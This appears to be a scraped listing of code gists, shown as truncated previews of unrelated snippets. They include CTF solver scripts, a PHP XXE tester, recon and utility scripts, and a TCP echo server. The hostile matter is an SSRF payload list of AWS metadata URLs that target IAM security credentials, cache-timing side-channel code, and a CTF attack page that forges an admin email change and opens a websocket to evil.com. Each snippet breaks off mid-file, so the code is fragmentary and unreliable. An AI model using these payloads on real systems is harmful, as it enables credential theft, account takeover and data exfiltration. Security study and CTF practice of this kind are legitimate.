Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
| from scryptos import * | |
| d = open("out.csv").read().split("\n") | |
| bits = "" | |
| for x in d: | |
| r = x.split(", ") | |
| if len(r) > 4: | |
| if int(r[3]) == 0: | |
| if r[2] == "Note_on_c": |
| <?php | |
| // Extended tester from ezimuel (https://gist.github.com/ezimuel/9135151) | |
| // The libxml entity loader is disabled by default | |
| // even setting the libxml_disable_entity_loader to false doesn't works! | |
| // | |
| // @see http://uk3.php.net/manual/en/function.libxml-disable-entity-loader.php | |
| // @see http://stackoverflow.com/a/10213239 | |
| // @see https://stackoverflow.com/questions/24117700 | |
| $dir = __DIR__; |
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
| global _time_load | |
| global _cache_flush | |
| global _run_attempt | |
| extern _bools | |
| extern _values | |
| extern _pointers | |
| section .text |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
| <body> | |
| <form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST"> | |
| // change admin's email | |
| <input type="text" name="email" value="[email protected]"> | |
| <input type="text" name="csrf" value=""> | |
| <input type="text" name="change" value="Modify profile"> | |
| </form> | |
| <iframe id="leakchar"></iframe> | |
| <script> | |
| const WS = "ws://evil.com:8000"; |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
| ;; Simple TCP echo server in x86_64 assembly, using Linux syscalls | |
| ;; | |
| ;; nasm -felf64 -o server.o server.asm | |
| ;; ld server.o -o server | |
| ;; ./server | |
| ;; | |
| global _start | |
| ;; Data definitions |
| #!/bin/env python | |
| import math | |
| import sys | |
| ''' | |
| This is a script which counts a character entropy in a single string. | |
| Usage: entropy.py STRING |